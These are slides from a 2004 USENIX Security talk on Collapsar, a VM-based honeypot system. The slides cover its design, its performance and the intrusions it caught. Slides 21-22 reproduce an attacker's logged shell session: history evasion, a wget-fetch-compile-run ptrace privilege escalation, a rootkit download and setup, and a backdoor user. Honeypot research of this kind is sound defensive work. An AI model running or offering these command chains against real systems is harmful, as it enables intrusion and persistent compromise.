1. Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University USENIX Security 2004

2. Outline  Motivation  Collapsar architecture and features  Collapsar design, implementation, and performance  Collapsar deployment and real-world incidents  Conclusion and on-going work

3. Motivation  Need for network attack containment and monitoring  Worm outbreaks (MSBlaster, Sasser…)  Debian project servers hacked (Nov. 2003)  PlanetLab nodes compromised (Dec. 2003)  And more

4. Motivation  Promise of honeypots  Providing insights into intruders’ motivations, tactics, and tools  Highly concentrated datasets w/ low noise  Low false-positive and false negative rate  Discovering unknown vulnerabilities/exploitations  Example: CERT advisory CA-2002-01 (solaris CDE subprocess control daemon – dtspcd)

5. Current Honeypot Operation  Individual honeypots  Limited local view of attacks  Federation of distributed honeypots  Deploying honeypots in different networks  Exchanging logs and alerts  Problems  Difficulties in distributed management  Lack of honeypot expertise  Inconsistency in security and management policies  Example: log format, sharing policy, exchange frequency

6. Our Solution: Collapsar  Based on the HoneyFarm idea of Lance Spitzner  Achieving two (seemingly) conflicting goals  Distributed honeypot presence  Centralized honeypot operation  Key ideas  Leveraging unused IP addresses in each network  Diverting corresponding traffic to a “detention” center (transparently)  Creating VM-based honeypots in the center

7. VM-based Honeypot Collapsar Architecture Redirector Correlation Engine Management Station Production Network Collapsar Center Attacker Front-End

8. Comparison with Current Approaches  Overlay-based approach (e.g., NetBait, Domino overlay)  Honeypots deployed in different sites  Logs aggregated from distributed honeypots  Data mining performed on aggregated log information  Key difference: where the attacks take place (on-site vs. off-site)

9. Comparison with Current Approaches  Sinkhole networking approach (e.g., iSink )  “Dark” space to monitor Internet abnormality and commotion (e.g. msblaster worms)  Limited interaction for better scalability  Key difference: contiguous large address blocks (vs. scattered addresses)

10. Comparison with Current Approaches  Low-interaction approach (e.g., honeyd, iSink )  Highly scalable deployment  Low security risks  Key difference: emulated services (vs. real things)  Less effective to reveal unknown vulnerabilities  Less effective to capture 0-day worms

11. Collapsar Design  Functional components  Redirector  Collapsar Front-End  Virtual honeypots  Assurance modules  Logging module  Tarpitting module  Correlation module

12. Functional Components  Redirector  Running in each participating network  Capturing traffic toward unused IP addresses  Redirecting to Collapsar Front-End  Two implementation options  Proxy-ARP approach  Longer latency  Minimum change to network infrastructure  GRE (Generic Routing Encapsulation) approach  Lower latency  Requiring router re-configuration  Missing attack traffic from inside a domain

13. Functional Components  Collapsar Front-End  Dispatching incoming traffic to different honeypots  Transparent bridging  Mitigating security risks  Transparent firewalling  Packet re-writing  Assurance module plug-in  Logging modules  Tarpitting modules

14. Functional Components  Virtual honeypots  VM-based high-interaction honeypots  VMware  Enhanced User-Mode Linux (UML)  Commodity OS and popular services  Linux, Windows, Solaris, FreeBSD  Apache, samba, sendmail, named  Capability of forensic analysis  System image snapshot / restoration

15. Assurance Modules  Logging module  Traffic logging  Where: Front-End and honeypots  Keystroke logging  Where: honeypots  Tarpitting module  Mitigating security risks  Where: Front-End  Correlation module  Mining and correlation (e.g., tcpdump, snort) (e.g., sebek) (e.g., snort-inline)

16.  Measurement set-up  Metrics  TCP throughput  Nock (http://www.cs.wisc.edu/~zandy/p/nock)  ICMP latency Performance Measurement Dell PowerEdge Server (2.6GHz Xeon/2GB Memory) Dell Desktop PC (1.8GHz Pentium 4/768MB Memory) Collapsar Center A VMware or UML H Redirector Front-End

17. TCP throughput Measurement Results

18. ICMP latency

19. Collapsar Deployment  Deployed in a local environment for a two-month period in 2003  Traffic redirected from five networks  Three wired LANs  One wireless LAN  One DSL network  ~ 40 honeypots analyzed so far  Internet worms (MSBlaster, Enbiei, Nachi )  Interactive intrusions (Apache, Samba)  OS: Windows, Linux, Solaris, FreeBSD

20. Incident: Apache Honeypot/VMware  Vulnerabilities  Vul 1: Apache (CERT® CA-2002-17)  Vul 2: Ptrace (CERT® VU-6288429)  Time-line  Deployed: 23:44:03pm, 11/24/03  Compromised: 09:33:55am, 11/25/03  Attack monitoring  Detailed log  http://www.cs.purdue.edu/homes/jiangx/collapsar

21. [2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat- release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse- release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo [2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp [2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p 1. Gaining a regular account: apache 2. Escalating to the root privilege Incident: Apache Honeypot/VMware

22. [2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985 [2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY- Release-0.53b [2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd [2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd; mkdir.logs;cd.logs [2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make [2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst [2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm [2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm/dev/null & 3. Installing a set of backdoors 4. Adding the ftp user and installing a IRC-based ftp server Incident: Apache Honeypot/VMware

23. Incident: Windows XP Honeypot/VMware  Vulnerability  RPC DCOM Vul. (Microsoft Security Bulletin MS03-026)  Time-line  Deployed: 22:10:00pm, 11/26/03  MSBlaster: 00:36:47am, 11/27/03  Enbiei: 01:48:57am, 11/27/03  Nachi: 07:03:55am, 11/27/03

24. Log Correlation: Stepping Stone iii.jjj.kkk.11 compromised a honeypot & installed a rootkit, which contained an ssh backdoor xx.yyy.zzz.3 connected to the ssh backdoor using the same passwd

25. Log Correlation: Network Scanning

26. Conclusions  A new architecture for attack containment and monitoring  Distributed presence and centralized operation of honeypots  Good potential in attack correlation and log mining  Unique features  Aggregation of Scattered unused IP addresses  Off-site (relative to participating networks) attack occurrences and monitoring  Real services for unknown vulnerability revelation

27. On-going Work  Integration into trusted server architectures (SODA and Poly 2 )  On-demand honeypot customization  Collapsar center federation  Scalability  Testbed for worm containment (coming soon)

28. Thank you. For more information: Email: {dxu, jiangx}@cs.purdue.eduxu, jiangx}@cs.purdue.edu URL: www.cs.purdue.edu/~dxuwww.cs.purdue.edu/~dxu Google: “Purdue Collapsar friends”